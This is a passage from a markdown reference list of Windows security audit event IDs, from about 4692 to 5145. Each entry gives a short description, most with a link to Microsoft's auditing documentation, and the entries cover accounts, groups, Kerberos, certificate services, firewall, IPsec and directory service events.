attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4692)\n- [4693: Recovery of data protection master key was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4693)\n- [4694: Protection of auditable protected data was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4694)\n- [4695: Unprotection of auditable protected data was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4695)\n- [4696: A primary token was assigned to process.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4696)\n- [4697: A service was installed in the system.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4697)\n- [4698: A scheduled task was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698)\n- [4699: A scheduled task was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699)\n- [4700: A scheduled task was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4700)\n- [4701: A scheduled task was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701)\n- [4702: A scheduled task was updated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4702)\n- [4703: A user right was adjusted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4703)\n- [4704: A user right was assigned.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4704)\n- [4705: A user right was 
removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4705)\n- [4706: A new trust was created to a domain.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706)\n- [4707: A trust to a domain was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4707)\n- [4709: IPsec Services was started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4709)\n- [4710: IPsec Services was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4710)\n- [4711: May contain any one of the following:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4711)\n- [4712: IPsec Services encountered a potentially serious failure.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4712)\n- [4713: Kerberos policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4713)\n- [4714: Encrypted data recovery policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4714)\n- [4715: The audit policy (SACL) on an object was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4715)\n- [4716: Trusted domain information was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4716)\n- [4717: System security access was granted to an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4717)\n- [4718: System security access was removed from an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4718)\n- [4719: System audit policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4719)\n- [4720: A user account was 
created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720)\n- [4722: A user account was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4722)\n- [4723: An attempt was made to change an account's password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4723)\n- [4724: An attempt was made to reset an account's password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724)\n- [4725: A user account was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4725)\n- [4726: A user account was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4726)\n- [4727: A security-enabled global group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4727)\n- [4728: A member was added to a security-enabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4728)\n- [4729: A member was removed from a security-enabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4729)\n- [4730: A security-enabled global group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4730)\n- [4731: A security-enabled local group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4731)\n- [4732: A member was added to a security-enabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4732)\n- [4733: A member was removed from a security-enabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4733)\n- [4734: A security-enabled local group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4734)\n- [4735: A security-enabled local group was 
changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4735)\n- [4737: A security-enabled global group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4737)\n- [4738: A user account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738)\n- [4739: Domain Policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4739)\n- [4740: A user account was locked out.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4740)\n- [4741: A computer account was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741)\n- [4742: A computer account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4742)\n- [4743: A computer account was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743)\n- [4744: A security-disabled local group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4744)\n- [4745: A security-disabled local group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4745)\n- [4746: A member was added to a security-disabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4746)\n- [4747: A member was removed from a security-disabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4747)\n- [4748: A security-disabled local group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4748)\n- [4749: A security-disabled global group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4749)\n- [4750: A security-disabled global group was 
changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4750)\n- [4751: A member was added to a security-disabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4751)\n- [4752: A member was removed from a security-disabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4752)\n- [4753: A security-disabled global group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4753)\n- [4754: A security-enabled universal group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4754)\n- [4755: A security-enabled universal group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4755)\n- [4756: A member was added to a security-enabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4756)\n- [4757: A member was removed from a security-enabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4757)\n- [4758: A security-enabled universal group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4758)\n- [4759: A security-disabled universal group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4759)\n- [4760: A security-disabled universal group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4760)\n- [4761: A member was added to a security-disabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4761)\n- [4762: A member was removed from a security-disabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4762)\n- [4763: A security-disabled universal 
group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4763)\n- [4764: A group's type was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4764)\n- [4765: SID History was added to an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4765)\n- [4766: An attempt to add SID History to an account failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4766)\n- [4767: A user account was unlocked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4767)\n- [4768: A Kerberos authentication ticket (TGT) was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768)\n- [4769: A Kerberos service ticket was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4769)\n- [4770: A Kerberos service ticket was renewed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4770)\n- [4771: Kerberos pre-authentication failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771)\n- [4772: A Kerberos authentication ticket request failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4772)\n- [4773: A Kerberos service ticket request failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4773)\n- [4774: An account was mapped for logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4774)\n- [4775: An account could not be mapped for logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4775)\n- [4776: The computer attempted to validate the credentials for an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776)\n- [4777: The domain 
controller failed to validate the credentials for an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4777)\n- [4778: A session was reconnected to a Window Station.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4778)\n- [4779: A session was disconnected from a Window Station.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4779)\n- [4780: The ACL was set on accounts which are members of administrators groups.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4780)\n- [4781: The name of an account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4781)\n- [4782: The password hash of an account was accessed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4782)\n- [4783: A basic application group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4783)\n- [4784: A basic application group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4784)\n- [4785: A member was added to a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4785)\n- [4786: A member was removed from a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4786)\n- [4787: A non-member was added to a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4787)\n- [4788: A non-member was removed from a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4788)\n- [4789: A basic application group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4789)\n- [4790: An LDAP query group was 
created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4790)\n- [4791: An LDAP query group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4791)\n- [4792: An LDAP query group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4792)\n- [4793: The Password Policy Checking API was called.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4793)\n- [4794: An attempt was made to set the Directory Services Restore Mode administrator password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4794)\n- [4798: A user's local group membership was enumerated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4798)\n- [4799: A security-enabled local group membership was enumerated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799)\n- [4800: The workstation was locked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4800)\n- [4801: The workstation was unlocked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4801)\n- [4802: The screen saver was invoked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4802)\n- [4803: The screen saver was dismissed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4803)\n- [4816: RPC detected an integrity violation while decrypting an incoming message.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4816)\n- [4817: Auditing settings on object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4817)\n- [4818: Proposed Central Access Policy does not grant the same access permissions as the current Central Access 
Policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4818)\n- [4819: Central Access Policies on the machine have been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4819)\n- [4826: Boot Configuration Data loaded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4826)\n- [4864: A namespace collision was detected.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4864)\n- [4865: A trusted forest information entry was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4865)\n- [4866: A trusted forest information entry was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4866)\n- [4867: A trusted forest information entry was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4867)\n- [4868: The certificate manager denied a pending certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4868)\n- [4869: Certificate Services received a resubmitted certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4869)\n- [4870: Certificate Services revoked a certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4870)\n- [4871: Certificate Services received a request to publish the certificate revocation list (CRL).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4871)\n- [4872: Certificate Services published the certificate revocation list (CRL).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4872)\n- [4873: A certificate request extension changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4873)\n- [4874: One or more certificate request 
attributes changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4874)\n- [4875: Certificate Services received a request to shut down.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4875)\n- [4876: Certificate Services backup started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4876)\n- [4877: Certificate Services backup completed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4877)\n- [4878: Certificate Services restore started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4878)\n- [4879: Certificate Services restore completed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4879)\n- [4880: Certificate Services started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4880)\n- [4881: Certificate Services stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4881)\n- [4882: The security permissions for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4882)\n- [4883: Certificate Services retrieved an archived key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4883)\n- [4884: Certificate Services imported a certificate into its database.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4884)\n- [4885: The audit filter for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4885)\n- [4886: Certificate Services received a certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4886)\n- [4887: Certificate Services approved a certificate request and issued a 
certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4887)\n- [4888: Certificate Services denied a certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4888)\n- [4889: Certificate Services set the status of a certificate request to pending.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4889)\n- [4890: The certificate manager settings for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4890)\n- [4891: A configuration entry changed in Certificate Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4891)\n- [4892: A property of Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4892)\n- [4893: Certificate Services archived a key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4893)\n- [4894: Certificate Services imported and archived a key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4894)\n- [4895: Certificate Services published the CA certificate to Active Directory Domain Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4895)\n- [4896: One or more rows have been deleted from the certificate database.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4896)\n- [4897: Role separation enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4897)\n- [4898: Certificate Services loaded a template.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4898)\n- [4902: The Per-user audit policy table was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4902)\n- [4904: An attempt was made to register a 
security event source.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4904)\n- [4905: An attempt was made to unregister a security event source.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4905)\n- [4906: The CrashOnAuditFail value has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4906)\n- [4907: Auditing settings on object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4907)\n- [4908: Special Groups Logon table modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4908)\n- [4909: The local policy settings for the TBS were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4909)\n- [4910: The group policy settings for the TBS were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4910)\n- [4911: Resource attributes of the object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4911)\n- [4912: Per User Audit Policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4912)\n- [4913: Central Access Policy on the object was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4913)\n- [4928: An Active Directory replica source naming context was established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4928)\n- [4929: An Active Directory replica source naming context was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4929)\n- [4930: An Active Directory replica source naming context was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4930)\n- [4931: An Active Directory replica destination naming context 
was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4931)\n- [4932: Synchronization of a replica of an Active Directory naming context has begun.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4932)\n- [4933: Synchronization of a replica of an Active Directory naming context has ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4933)\n- [4934: Attributes of an Active Directory object were replicated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4934)\n- [4935: Replication failure begins.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4935)\n- [4936: Replication failure ends.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4936)\n- [4937: A lingering object was removed from a replica.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4937)\n- [4944: The following policy was active when the Windows Firewall started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4944)\n- [4945: A rule was listed when the Windows Firewall started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4945)\n- [4946: A change has been made to Windows Firewall exception list. A rule was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4946)\n- [4947: A change has been made to Windows Firewall exception list. A rule was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4947)\n- [4948: A change has been made to Windows Firewall exception list. 
A rule was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4948)\n- [4949: Windows Firewall settings were restored to the default values.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4949)\n- [4950: A Windows Firewall setting has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4950)\n- [4951: A rule has been ignored because its major version number was not recognized by Windows Firewall.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4951)\n- [4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4952)\n- [4953: A rule has been ignored by Windows Firewall because it could not parse the rule.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4953)\n- [4954: Windows Firewall Group Policy settings have changed. 
The new settings have been applied.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4954)\n- [4956: Windows Firewall has changed the active profile.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4956)\n- [4957: Windows Firewall did not apply the following rule:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4957)\n- [4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4958)\n- [4960: IPsec dropped an inbound packet that failed an integrity check.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4960)\n- 4961: IPsec dropped an inbound packet that failed a replay check.\n- 4962: IPsec dropped an inbound packet that failed a replay check.\n- [4963: IPsec dropped an inbound clear text packet that should have been secured.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4963)\n- [4964: Special groups have been assigned to a new logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964)\n- [4965: IPsec received a packet from a remote computer with an incorrect Security Parameter Index (SPI).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4965)\n- [4976: During Main Mode negotiation, IPsec received an invalid negotiation packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4976)\n- [4977: During Quick Mode negotiation, IPsec received an invalid negotiation packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4977)\n- [4978: During Extended Mode negotiation, IPsec received an invalid negotiation 
packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4978)\n- [4979: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4979)\n- [4980: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4980)\n- [4981: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4981)\n- [4982: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4982)\n- [4983: An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4983)\n- [4984: An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4984)\n- [4985: The state of a transaction has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4985)\n- [5024: The Windows Firewall Service has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5024)\n- [5025: The Windows Firewall Service has been stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5025)\n- [5027: The Windows Firewall Service was unable to retrieve the security policy from the local storage. 
The service will continue enforcing the current policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5027)\n- [5028: The Windows Firewall Service was unable to parse the new security policy. The service will continue with currently enforced policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5028)\n- [5029: The Windows Firewall Service failed to initialize the driver. The service will continue to enforce the current policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5029)\n- [5030: The Windows Firewall Service failed to start.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5030)\n- [5031: The Windows Firewall Service blocked an application from accepting incoming connections on the network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5031)\n- [5032: Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5032)\n- [5033: The Windows Firewall Driver has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5033)\n- [5034: The Windows Firewall Driver was stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5034)\n- [5035: The Windows Firewall Driver failed to start.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5035)\n- [5037: The Windows Firewall Driver detected critical runtime error. Terminating.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5037)\n- [5038: Code integrity determined that the image hash of a file is not valid. 
The file could be corrupt due to unauthorized modification or the invalid hash could indicate a potential disk device error.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5038)\n- [5039: A registry key was virtualized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5039)\n- [5040: A change has been made to IPsec settings. An Authentication Set was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5040)\n- [5041: A change has been made to IPsec settings. An Authentication Set was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5041)\n- [5042: A change has been made to IPsec settings. An Authentication Set was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5042)\n- [5043: A change has been made to IPsec settings. A Connection Security Rule was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5043)\n- [5044: A change has been made to IPsec settings. A Connection Security Rule was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5044)\n- [5045: A change has been made to IPsec settings. A Connection Security Rule was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5045)\n- [5046: A change has been made to IPsec settings. A Crypto Set was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5046)\n- [5047: A change has been made to IPsec settings. A Crypto Set was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5047)\n- [5048: A change has been made to IPsec settings. 
A Crypto Set was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5048)\n- [5049: An IPsec Security Association was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5049)\n- [5051: A file was virtualized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5051)\n- [5056: A cryptographic self-test was performed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5056)\n- [5057: A cryptographic primitive operation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5057)\n- [5058: Key file operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5058)\n- [5059: Key migration operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5059)\n- [5060: Verification operation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5060)\n- [5061: Cryptographic operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5061)\n- [5062: A kernel-mode cryptographic self-test was performed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5062)\n- [5063: A cryptographic provider operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5063)\n- [5064: A cryptographic context operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5064)\n- [5065: A cryptographic context modification was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5065)\n- [5066: A cryptographic function operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5066)\n- [5067: A cryptographic function modification was 
attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5067)\n- [5068: A cryptographic function provider operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5068)\n- [5069: A cryptographic function property operation was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5069)\n- [5070: A cryptographic function property modification was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5070)\n- [5136: A directory service object was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136)\n- [5137: A directory service object was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5137)\n- [5138: A directory service object was undeleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5138)\n- [5139: A directory service object was moved.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5139)\n- [5140: A network share object was accessed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5140)\n- [5141: A directory service object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5141)\n- [5142: A network share object was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5142)\n- [5143: A network share object was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5143)\n- [5144: A network share object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5144)\n- [5145: A network share object was checked to see whether client can be granted desired 
